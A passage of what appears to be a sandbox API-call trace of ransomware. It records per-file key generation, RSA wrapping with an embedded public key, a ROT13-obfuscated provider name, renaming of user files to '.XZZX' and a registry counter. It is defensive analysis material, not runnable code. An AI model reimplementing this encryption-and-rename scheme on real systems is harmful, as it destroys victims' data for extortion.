MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.524] lstrcpyW (in: lpString1=0x42bf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0146.524] lstrcpyW (in: lpString1=0x42be860, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0146.524] SetErrorMode (uMode=0x1) returned 0x1 [0146.524] lstrcpyW (in: lpString1=0x42bf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0146.524] CoCreateGuid (in: pguid=0x42be440 | out: pguid=0x42be440*(Data1=0xaff867ca, Data2=0xf067, Data3=0x4ae5, Data4=([0]=0xa0, [1]=0x19, [2]=0xf6, [3]=0x46, [4]=0xbf, [5]=0x68, [6]=0x9d, [7]=0x60))) returned 0x0 [0146.524] wsprintfW (in: param_1=0x42bec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0146.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42bfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0146.524] wsprintfW (in: param_1=0x42be450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\AE3F22464654D223AFF867CA4A80B66B.XZZX") returned 78 [0146.524] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0146.524] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", dwFileAttributes=0x20) returned 1 [0146.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x918 [0146.525] ReadFile (in: hFile=0x918, lpBuffer=0x397ac8, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x42be418, lpOverlapped=0x0 | out: lpBuffer=0x397ac8*, lpNumberOfBytesRead=0x42be418*=0x146, lpOverlapped=0x0) returned 1 [0146.526] CloseHandle (hObject=0x918) returned 1 [0146.526] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0146.527] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4110000 [0146.527] SetErrorMode (uMode=0x1) returned 0x1 [0146.527] lstrcpyW (in: lpString1=0x42be358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0146.527] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437aad0) returned 1 [0146.530] CryptGenKey (in: hProv=0x437aad0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43720b8) returned 1 [0146.844] CryptExportKey (in: hKey=0x43720b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42be41c | out: pbData=0x0*, pdwDataLen=0x42be41c*=0x94) returned 1 [0146.844] CryptExportKey (in: hKey=0x43720b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4110000, pdwDataLen=0x42be41c | out: pbData=0x4110000*, pdwDataLen=0x42be41c*=0x94) returned 1 [0146.844] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.845] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0146.845] CryptDestroyKey (hKey=0x43720b8) returned 1 [0146.845] CryptReleaseContext (hProv=0x437ac68, dwFlags=0x0) returned 0 [0146.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\AE3F22464654D223AFF867CA4A80B66B.XZZX" (normalized: "c:\\users\\public\\videos\\sample videos\\ae3f22464654d223aff867ca4a80b66b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x930 [0146.896] WriteFile (in: hFile=0x930, lpBuffer=0x397ac8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x42be438, lpOverlapped=0x0 | out: lpBuffer=0x397ac8*, lpNumberOfBytesWritten=0x42be438*=0x146, lpOverlapped=0x0) returned 1 [0146.896] SetFilePointer (in: hFile=0x930, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x146 [0146.897] WriteFile (in: hFile=0x930, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42be438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42be438*=0x5, lpOverlapped=0x0) returned 1 [0146.897] SetFilePointer (in: hFile=0x930, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14b [0146.897] WriteFile (in: hFile=0x930, lpBuffer=0x42bf860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x42be438, lpOverlapped=0x0 | out: lpBuffer=0x42bf860*, lpNumberOfBytesWritten=0x42be438*=0x16, lpOverlapped=0x0) returned 1 [0146.897] SetFilePointer (in: hFile=0x930, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x161 [0146.897] WriteFile (in: hFile=0x930, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42be438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42be438*=0x5, lpOverlapped=0x0) returned 1 [0146.897] SetFilePointer (in: hFile=0x930, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x166 [0146.897] SetErrorMode (uMode=0x1) returned 0x1 [0146.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0146.897] OutputDebugStringW (lpOutputString="end") [0146.897] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ+\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42bdbf4, pcbBinary=0x42bd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42bdbf4, pcbBinary=0x42bd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0146.897] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42bdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42bd3dc, pcbStructInfo=0x42bd3d8 | out: pvStructInfo=0x42bd3dc, pcbStructInfo=0x42bd3d8) returned 1 [0146.897] CryptAcquireContextW (in: phProv=0x42bd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42bd3e4*=0x3cc1078) returned 1 [0146.898] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1078, dwCertEncodingType=0x1, pInfo=0x437e118*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e148*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e150*, PublicKey.cUnusedBits=0x0), phKey=0x42bd3ec | out: phKey=0x42bd3ec*=0x43721f8) returned 1 [0146.898] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.899] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0146.899] CryptEncrypt (in: hKey=0x43721f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42bd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42bd3f0*=0x80) returned 1 [0146.899] CryptEncrypt (in: hKey=0x43721f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1100*, pdwDataLen=0x42bd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1100*, pdwDataLen=0x42bd3e8*=0x80) returned 1 [0146.899] WriteFile (in: hFile=0x930, lpBuffer=0x3cc1100*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42be438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1100*, lpNumberOfBytesWritten=0x42be438*=0x80, lpOverlapped=0x0) returned 1 [0146.899] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0146.899] WriteFile (in: hFile=0x930, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42be438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42be438*=0x5, lpOverlapped=0x0) returned 1 [0146.899] GetUserNameW (in: lpBuffer=0x42be1f8, pcbBuffer=0x42bdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42bdfe0) returned 1 [0146.899] wsprintfW (in: param_1=0x42bdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0146.899] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42bdfe4 | out: phkResult=0x42bdfe4*=0x934) returned 0x0 [0146.899] RegQueryValueExW (in: hKey=0x934, lpValueName="E1010314", lpReserved=0x0, lpType=0x42bdfd8, lpData=0x42bdfec, lpcbData=0x42bdfdc*=0x4 | out: lpType=0x42bdfd8*=0x4, lpData=0x42bdfec*=0xda, lpcbData=0x42bdfdc*=0x4) returned 0x0 [0146.900] RegCloseKey (hKey=0x934) returned 0x0 [0146.900] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42bdfe8 | out: phkResult=0x42bdfe8*=0x934) returned 0x0 [0146.900] RegSetValueExW (in: hKey=0x934, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42bdfec*=0xdb, cbData=0x4 | out: lpData=0x42bdfec*=0xdb) returned 0x0 [0146.900] RegCloseKey (hKey=0x934) returned 0x0 [0146.900] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.900] VirtualFree (lpAddress=0x4110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.901] CloseHandle (hObject=0x930) returned 1 [0146.901] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0146.901] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0146.901] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini")) returned 1 [0146.902] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini")) returned 0 Thread: id = 526 os_tid = 0xb98 [0146.702] lstrcpyA (in: lpString1=0x485fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.702] lstrcpyW (in: lpString1=0x485f460, lpString2="Wildlife.wmv" | out: lpString1="Wildlife.wmv") returned="Wildlife.wmv" [0146.702] lstrcpyW (in: lpString1=0x485e860, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0146.702] SetErrorMode (uMode=0x1) returned 0x1 [0146.702] lstrcpyW (in: lpString1=0x485f860, lpString2="Wildlife.wmv" | out: lpString1="Wildlife.wmv") returned="Wildlife.wmv" [0146.702] CoCreateGuid (in: pguid=0x485e440 | out: pguid=0x485e440*(Data1=0x25b9d9ae, Data2=0xce77, Data3=0x40c3, Data4=([0]=0xa8, [1]=0xbf, [2]=0x4, [3]=0x47, [4]=0x59, [5]=0x27, [6]=0x37, [7]=0xf8))) returned 0x0 [0146.702] wsprintfW (in: param_1=0x485ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0146.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x485fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0146.702] wsprintfW (in: param_1=0x485e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\168E33E2343B04A525B9D9AE38C0E8ED.XZZX") returned 78 [0146.702] StrStrW (lpFirst="Wildlife.wmv", lpSrch="XZZX") returned 0x0 [0146.702] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", dwFileAttributes=0x20) returned 1 [0146.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e4 [0146.703] CreateFileMappingW (hFile=0x8e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8ec [0146.703] MapViewOfFile (hFileMappingObject=0x8ec, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x5240000 [0146.704] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0146.705] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0146.705] SetErrorMode (uMode=0x1) returned 0x1 [0146.705] lstrcpyW (in: lpString1=0x485e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0146.705] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437ac68) returned 1 [0146.707] CryptGenKey (in: hProv=0x437ac68, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372178) returned 1 [0146.937] CryptExportKey (in: hKey=0x4372178, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x485e420 | out: pbData=0x0*, pdwDataLen=0x485e420*=0x94) returned 1 [0146.937] CryptExportKey (in: hKey=0x4372178, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x485e420 | out: pbData=0x40a0000*, pdwDataLen=0x485e420*=0x94) returned 1 [0146.937] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0146.938] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0146.938] CryptDestroyKey (hKey=0x4372178) returned 1 [0146.938] CryptReleaseContext (hProv=0x437ac68, dwFlags=0x0) returned 0 [0147.097] UnmapViewOfFile (lpBaseAddress=0x5240000) returned 1 [0147.122] CloseHandle (hObject=0x8ec) returned 1 [0147.122] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1907b8a [0147.122] WriteFile (in: hFile=0x8e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x485e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x485e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.123] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1907b8f [0147.123] WriteFile (in: hFile=0x8e4, lpBuffer=0x485f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x485e42c, lpOverlapped=0x0 | out: lpBuffer=0x485f860*, lpNumberOfBytesWritten=0x485e42c*=0x18, lpOverlapped=0x0) returned 1 [0147.123] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1907ba7 [0147.123] WriteFile (in: hFile=0x8e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x485e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x485e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.123] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0147.123] SetErrorMode (uMode=0x1) returned 0x1 [0147.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0147.123] OutputDebugStringW (lpOutputString="end") [0147.124] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Յ\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x485dbf4, pcbBinary=0x485d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x485dbf4, pcbBinary=0x485d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0147.124] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x485dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x485d3dc, pcbStructInfo=0x485d3d8 | out: pvStructInfo=0x485d3dc, pcbStructInfo=0x485d3d8) returned 1 [0147.124] CryptAcquireContextW (in: phProv=0x485d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x485d3e4*=0x3cc1320) returned 1 [0147.124] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1320, dwCertEncodingType=0x1, pInfo=0x3cf3180*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf31b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf31b8*, PublicKey.cUnusedBits=0x0), phKey=0x485d3ec | out: phKey=0x485d3ec*=0x4372278) returned 1 [0147.124] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0147.125] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0147.125] CryptEncrypt (in: hKey=0x4372278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x485d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x485d3f0*=0x80) returned 1 [0147.125] CryptEncrypt (in: hKey=0x4372278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc13a8*, pdwDataLen=0x485d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc13a8*, pdwDataLen=0x485d3e8*=0x80) returned 1 [0147.125] OutputDebugStringW (lpOutputString="Ȇ") [0147.125] WriteFile (in: hFile=0x8e4, lpBuffer=0x3cc13a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x485e42c, lpOverlapped=0x0 | out: lpBuffer=0x3cc13a8*, lpNumberOfBytesWritten=0x485e42c*=0x80, lpOverlapped=0x0) returned 1 [0147.125] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0147.125] WriteFile (in: hFile=0x8e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x485e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x485e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.125] CloseHandle (hObject=0x8e4) returned 1 [0147.125] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.125] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.125] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\168E33E2343B04A525B9D9AE38C0E8ED.XZZX" (normalized: "c:\\users\\public\\videos\\sample videos\\168e33e2343b04a525b9d9ae38c0e8ed.xzzx"), dwFlags=0x1) returned 1 [0147.126] GetUserNameW (in: lpBuffer=0x485e1f8, pcbBuffer=0x485dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x485dfe0) returned 1 [0147.126] wsprintfW (in: param_1=0x485dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0147.126] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x485dfe4 | out: phkResult=0x485dfe4*=0x8e4) returned 0x0 [0147.126] RegQueryValueExW (in: hKey=0x8e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x485dfd8, lpData=0x485dfec, lpcbData=0x485dfdc*=0x4 | out: lpType=0x485dfd8*=0x4, lpData=0x485dfec*=0xdd, lpcbData=0x485dfdc*=0x4) returned 0x0 [0147.126] RegCloseKey (hKey=0x8e4) returned 0x0 [0147.126] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x485dfe8 | out: phkResult=0x485dfe8*=0x8e4) returned 0x0 [0147.126] RegSetValueExW (in: hKey=0x8e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x485dfec*=0xde, cbData=0x4 | out: lpData=0x485dfec*=0xde) returned 0x0 [0147.126] RegCloseKey (hKey=0x8e4) returned 0x0 Thread: id = 527 os_tid = 0xba8 [0160.222] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.222] lstrcpyW (in: lpString1=0x29af460, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0160.222] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.222] SetErrorMode (uMode=0x1) returned 0x1 [0160.222] lstrcpyW (in: lpString1=0x29af860, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0160.222] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x8900e8c4, Data2=0xb16, Data3=0x4aca, Data4=([0]=0xae, [1]=0xfb, [2]=0x81, [3]=0xea, [4]=0x76, [5]=0x9a, [6]=0xb5, [7]=0x3a))) returned 0x0 [0160.222] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" 